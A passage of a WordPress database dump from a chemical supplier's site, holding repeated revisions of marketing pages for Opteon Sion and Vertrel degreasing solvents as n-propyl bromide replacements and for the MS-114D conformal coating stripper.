that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-10-12 20:13:43', '2016-10-12 20:13:43', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2606, 2, '2016-10-12 20:18:56', '2016-10-12 20:18:56', '<h1>Opteon™ Sion for Vapor Degreasing Solvent</h1>\r\n<h4><strong>What is Vapor Degreasing?</strong></h4>\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities. Opteon™ Sion Vapor Degreasing Solvent is great for removing soils and greases from metal parts.\r\n\r\n<strong>What types of industries use vapor degreasing, and where is it used?</strong>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<strong>What problems do manufacturers face when it comes to vapor degreasing?</strong>\r\n\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n\r\n<strong>What is Opteon Sion Specialty Fluid, and why are manufacturers converting to it?</strong>\r\n\r\nOpteon Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<strong>What specific products can Opteon Sion Specialty Fluid replace?</strong>\r\n<ul>\r\n 	<li>n-Propyl Bromide (nPB)</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>\r\n[ux_product_categories ids="231" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/sion/">Click here to learn more about Opteon Sion. </a>', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-10-12 20:18:56', '2016-10-12 20:18:56', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2607, 2, '2016-10-12 20:19:30', '2016-10-12 20:19:30', '<h1>Opteon™ Sion for Vapor Degreasing Solvent</h1>\r\n<h4><strong>What is Vapor Degreasing?</strong></h4>\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities. Opteon™ Sion Vapor Degreasing Solvent is great for removing soils and greases from metal parts.\r\n<h4><strong>What types of industries use vapor degreasing, and where is it used?</strong></h4>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<h4><strong>What problems do manufacturers face when it comes to vapor degreasing?</strong></h4>\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n<h4><strong>What is Opteon Sion Specialty Fluid, and why are manufacturers converting to it?</strong></h4>\r\nOpteon Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<h4><strong>What specific products can Opteon Sion Specialty Fluid replace?</strong></h4>\r\n<ul>\r\n 	<li>n-Propyl Bromide (nPB)</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>\r\n[ux_product_categories ids="231" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/sion/">Click here to learn more about Opteon Sion. </a>', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-10-12 20:19:30', '2016-10-12 20:19:30', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2608, 2, '2016-10-12 20:22:12', '2016-10-12 20:22:12', '<h1>Opteon™ Sion - Vapor Degreasing Solvent</h1>\r\n<h4><strong>What is Vapor Degreasing?</strong></h4>\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities. Opteon™ Sion Vapor Degreasing Solvent is great for removing soils and greases from metal parts.\r\n<h4><strong>What types of industries use vapor degreasing, and where is it used?</strong></h4>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<h4><strong>What problems do manufacturers face when it comes to vapor degreasing?</strong></h4>\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n<h4><strong>What is Opteon Sion Specialty Fluid, and why are manufacturers converting to it?</strong></h4>\r\nOpteon Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<h4><strong>What specific products can Opteon Sion Specialty Fluid replace?</strong></h4>\r\n<ul>\r\n 	<li>n-Propyl Bromide (nPB)</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>\r\n[ux_product_categories ids="231" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/sion/">Click here to learn more about Opteon Sion. </a>', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-10-12 20:22:12', '2016-10-12 20:22:12', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2609, 2, '2016-10-12 20:22:45', '2016-10-12 20:22:45', '<h1>Opteon™ Sion - Vapor Degreasing Solvent</h1>\r\n<h4><strong>What is Vapor Degreasing?</strong></h4>\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities. Opteon™ Sion Vapor Degreasing Solvent is great for removing soils and greases from metal parts.\r\n<h4><strong>What types of industries use vapor degreasing, and where is it used?</strong></h4>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<h4><strong>What problems do manufacturers face when it comes to vapor degreasing?</strong></h4>\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n<h4><strong>What is Opteon Sion Specialty Fluid, and why are manufacturers converting to it?</strong></h4>\r\nOpteon Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<h4><strong>What specific products can Opteon Sion Specialty Fluid replace?</strong></h4>\r\n<ul>\r\n 	<li>n-Propyl Bromide (nPB)</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>\r\n[ux_product_categories ids="231" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/sion/">Click here to learn more about Opteon Sion. </a>\r\n\r\nOpteon™ is  a trademark of The Chemours Company FC, LLC.', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-10-12 20:22:45', '2016-10-12 20:22:45', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2610, 2, '2016-10-12 20:25:54', '2016-10-12 20:25:54', '<h1>Opteon™ Sion - Vapor Degreasing Solvent</h1>\r\n<h4><strong>What is Vapor Degreasing?</strong></h4>\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities. Opteon™ Sion Vapor Degreasing Solvent is great for removing soils and greases from metal parts.\r\n<h4><strong>What types of industries use vapor degreasing, and where is it used?</strong></h4>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<h4><strong>What problems do manufacturers face when it comes to vapor degreasing?</strong></h4>\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n<h4><strong>What is Opteon Sion Specialty Fluid, and why are manufacturers converting to it?</strong></h4>\r\nOpteon Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<h4><strong>What specific products can Opteon Sion Specialty Fluid replace?</strong></h4>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/vertrel-fluids/">n-Propyl Bromide (nPB)</a></li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>\r\n[ux_product_categories ids="231" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/sion/">Click here to learn more about Opteon Sion. </a>\r\n\r\nOpteon™ is  a trademark of The Chemours Company FC, LLC.', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-10-12 20:25:54', '2016-10-12 20:25:54', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2611, 2, '2016-10-12 20:29:30', '2016-10-12 20:29:30', 'Why are Vertrel fluids a suitable replacement for nPB?\n\nRecently, the National Toxicity Program issued a report, dated August 2011, “Toxicology and Carcinogenesis Studies of 1-Bromopropane in F344/N Rats and B6C3F1 Mice (Inhalation studies).” https://ntp.niehs.nih.gov/ntp/htdocs/LT_rpts/TR564.pdf\n\nThe report concluded that there was “clear evidence of carcinogenic activity” in female mice and rats. As a result of this finding, Cal/OSHA has set an 8-hour worker permissible exposure limit (PEL) of 5 ppm. In addition, the American Conference of Governmental Industrial Hygienist (ACGIH) in 2011 has proposed a TLV of 0.1 ppm. Vertrel specialty fluids can replace nPB, providing the cleaning efficacy needed while addressing safety and health concerns. Here are five reasons it is an excellent replacement for nPB:\n<ol>\n 	<li><strong>Exposure Limit:</strong> Vertrel fluids have exposure limits around 200 ppm. By comparison, Isopropyl alcohol (rubbing alcohol) has an exposure limit of 200 ppm. The exposure limit of nPB exposure limit is measured between 5 ppm – 10 ppm by varying standards organizations.</li>\n 	<li> <strong>Cleaning Performance:</strong> Vertrel specialty fluids have the broadest range of cleaning power of any solvent family. KB values (a measure of cleaning power) range from 11 to a high of 110. Vertrel can match nPB’s cleaning power.</li>\n 	<li><strong>Solvent Maintenance:</strong> Vertrel fluids are inherently stable and do not need acid acceptance testing or stabilizer maintenance unlike nPB. In addition, the relatively high exposure limit of Vertrel enables the use of open top vapor degreasers, and solvent air monitoring can be kept to a minimum.</li>\n 	<li><strong>Solvent Usage:</strong> Today’s cleaning equipment manufacturers have improved system design resulting in significant reductions in the amount of solvent emissions and reducing overall operating costs. Vertrel is cost competitive with nPB as a result of the emissions reduction.</li>\n 	<li><strong>Global Acceptance:</strong> These specialty fluids are globally accepted as a safe cleaning material. Many countries have classified nPB as a reproductive toxin. In Europe, nPB is labeled as R60 (may impair fertility); R63 (possible risk of harm to the unborn child); and R48/20 (harmful: danger of serious damage to health by prolonged exposure through inhalation).</li>\n</ol>\n<strong>Summary</strong>\n\nVertrel <a href="https://www.miller-stephenson.com/chemicals/solvents/vertrel/">specialty fluids</a> have similar solvency strength as nPB. It is non-flammable, safe, and requires no stabilizers, making it an ideal replacement for nPB. <a href="https://www.miller-stephenson.com/chemicals/solvents/opteon-solvents/">Opteon™ products</a> are also a great replacement for nPb.\n\n<img class="alignnone size-full wp-image-2002" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/Vapor-Degreaser-1.jpg" alt="vapor-degreaser" width="680" height="498" />\n\n[ux_product_categories ids="232" number="10"]', 'Why Vertrel specialty fluids are a suitable replacement for nPB', '', 'inherit', 'closed', 'closed', '', '1121-autosave-v1', '', '', '2016-10-12 20:29:30', '2016-10-12 20:29:30', '', 1121, 'https://www.miller-stephenson.com/1121-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2612, 2, '2016-10-12 20:30:00', '2016-10-12 20:30:00', 'Why are Vertrel fluids a suitable replacement for nPB?\r\n\r\nRecently, the National Toxicity Program issued a report, dated August 2011, “Toxicology and Carcinogenesis Studies of 1-Bromopropane in F344/N Rats and B6C3F1 Mice (Inhalation studies).” https://ntp.niehs.nih.gov/ntp/htdocs/LT_rpts/TR564.pdf\r\n\r\nThe report concluded that there was “clear evidence of carcinogenic activity” in female mice and rats. As a result of this finding, Cal/OSHA has set an 8-hour worker permissible exposure limit (PEL) of 5 ppm. In addition, the American Conference of Governmental Industrial Hygienist (ACGIH) in 2011 has proposed a TLV of 0.1 ppm. Vertrel specialty fluids can replace nPB, providing the cleaning efficacy needed while addressing safety and health concerns. Here are five reasons it is an excellent replacement for nPB:\r\n<ol>\r\n 	<li><strong>Exposure Limit:</strong> Vertrel fluids have exposure limits around 200 ppm. By comparison, Isopropyl alcohol (rubbing alcohol) has an exposure limit of 200 ppm. The exposure limit of nPB exposure limit is measured between 5 ppm – 10 ppm by varying standards organizations.</li>\r\n 	<li> <strong>Cleaning Performance:</strong> Vertrel specialty fluids have the broadest range of cleaning power of any solvent family. KB values (a measure of cleaning power) range from 11 to a high of 110. Vertrel can match nPB’s cleaning power.</li>\r\n 	<li><strong>Solvent Maintenance:</strong> Vertrel fluids are inherently stable and do not need acid acceptance testing or stabilizer maintenance unlike nPB. In addition, the relatively high exposure limit of Vertrel enables the use of open top vapor degreasers, and solvent air monitoring can be kept to a minimum.</li>\r\n 	<li><strong>Solvent Usage:</strong> Today’s cleaning equipment manufacturers have improved system design resulting in significant reductions in the amount of solvent emissions and reducing overall operating costs. Vertrel is cost competitive with nPB as a result of the emissions reduction.</li>\r\n 	<li><strong>Global Acceptance:</strong> These specialty fluids are globally accepted as a safe cleaning material. Many countries have classified nPB as a reproductive toxin. In Europe, nPB is labeled as R60 (may impair fertility); R63 (possible risk of harm to the unborn child); and R48/20 (harmful: danger of serious damage to health by prolonged exposure through inhalation).</li>\r\n</ol>\r\n<strong>Summary</strong>\r\n\r\nVertrel <a href="https://www.miller-stephenson.com/chemicals/solvents/vertrel/">specialty fluids</a> have similar solvency strength as nPB. It is non-flammable, safe, and requires no stabilizers, making it an ideal replacement for nPB. <a href="https://www.miller-stephenson.com/chemicals/solvents/opteon-solvents/">Opteon™ products</a> are also a great replacement for nPb.\r\n\r\n<img class="alignnone size-full wp-image-2002" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/Vapor-Degreaser-1.jpg" alt="vapor-degreaser" width="680" height="498" />\r\n\r\n[ux_product_categories ids="232,231" number="10"]', 'Why Vertrel specialty fluids are a suitable replacement for nPB', '', 'inherit', 'closed', 'closed', '', '1121-revision-v1', '', '', '2016-10-12 20:30:00', '2016-10-12 20:30:00', '', 1121, 'https://www.miller-stephenson.com/1121-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2613, 0, '2016-10-12 20:50:42', '2016-10-12 20:50:42', '', '', '', 'publish', 'closed', 'closed', '', '2613', '', '', '2016-10-12 20:50:42', '2016-10-12 20:50:42', '', 0, 'https://www.miller-stephenson.com/nf_sub/2613/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2614, 2, '2016-10-13 02:14:43', '2016-10-13 02:14:43', '<h1><a href="https://www.miller-stephenson.com/product/sion/">Opteon™ Sion</a> - Vapor Degreasing Solvent</h1>\r\n<h4><strong>What is Vapor Degreasing?</strong></h4>\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities. Opteon™ Sion Vapor Degreasing Solvent is great for removing soils and greases from metal parts.\r\n<h4><strong>What types of industries use vapor degreasing, and where is it used?</strong></h4>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<h4><strong>What problems do manufacturers face when it comes to vapor degreasing?</strong></h4>\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n<h4><strong>What is Opteon Sion Specialty Fluid, and why are manufacturers converting to it?</strong></h4>\r\nOpteon Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<h4><strong>What specific products can Opteon Sion Specialty Fluid replace?</strong></h4>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/vertrel-fluids/">n-Propyl Bromide (nPB)</a></li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>\r\n[ux_product_categories ids="231" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/sion/">Click here to learn more about Opteon Sion. </a>\r\n\r\nOpteon™ is  a trademark of The Chemours Company FC, LLC.', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-10-13 02:14:43', '2016-10-13 02:14:43', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2616, 3, '2017-06-30 15:40:17', '2017-06-30 15:40:17', '<h2>MS-114D | Conformal Coating Stripper</h2>\nMS-114D, Miller-Stephenson\'s Conformal Coating Stripper is specifically formulated to remove most conformal coatings resins.  MS-114D Conformal Coating Stripping agent will dissolve all Silicone Conformal Coatings, Urethane Conformal Coatings, Acrylic Conformal Coatings, and Varnish Conformal Coatings from many types of electronic circuitry. MS-114D safely dissolves these coatings without causing damage to most electronic components and elastomers. It will attack ABS, acrylic and polystyrene. Compatibility with plastic materials should be tested before use.  Benefits of this product include:\n<ul>\n 	<li>Nonflammable formulation</li>\n 	<li>Fast, effective conformal coating removal</li>\n 	<li>Safe for printed circuit boards and electronics</li>\n 	<li>Contains no ozone depleting chemicals</li>\n 	<li>RoHS compliant</li>\n</ul>\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>\n<h3>MS-114D, Miller-Stephenson\'s Conformal Coating Stripper is non-flammable and the following standard safety precautions should be observed:</h3>\n<ul>\n 	<li>Use only in well ventilated areas.</li>\n 	<li>Protective gloves and goggles should be worn.</li>\n 	<li>In case of prolonged skin contact, wash with water.</li>\n 	<li>In case of eye contact, flush with water followed by a diluted boric solution and contact physician.</li>\n 	<li>Avoid prolonged breathing of vapours.</li>\n 	<li>Unused portions of stripping agent  must be disposed of in compliance with applicable environmental regulations.</li>\n 	<li>Consult the Material Safety Data Sheet (MSDS/SDS) for more specific product information.</li>\n</ul>', 'MS-114D | Conformal Coating Stripper', 'MS-114C, Miller-Stephenson&#039;s stripping agent is specifically formulated to remove Miller-Stephenson’s MS conformal coatings.  MS-114C Conformal Coating Stripper will dissolve all Silicone Coatings, Urethane Coatings, Acrylic Coatings, and Varnish Coatings from many types of electronic circuitry. MS-114C safely dissolves these coatings without causing damage to most electronic components and elastomers. It will attack ABS, acrylic and polystyrene. Compatibility with plastic materials should be tested before use.  Benefits of this product include:\n<ul>\n 	<li>Nonflammable formulation</li>\n 	<li>Fast, effective confortmal coating removal</li>\n 	<li>Safe for printed circuit boards and electronics</li>\n 	<li>Contains no ozone depleting chemicals</li>\n 	<li>RoHS compliant</li>\n</ul>', 'inherit', 'closed', 'closed', '', '623-autosave-v1', '', '', '2017-06-30 15:40:17', '2017-06-30 15:40:17', '', 623, 'https://www.miller-stephenson.com/623-autosave-v1/', 0, 'revision', '', 0); 
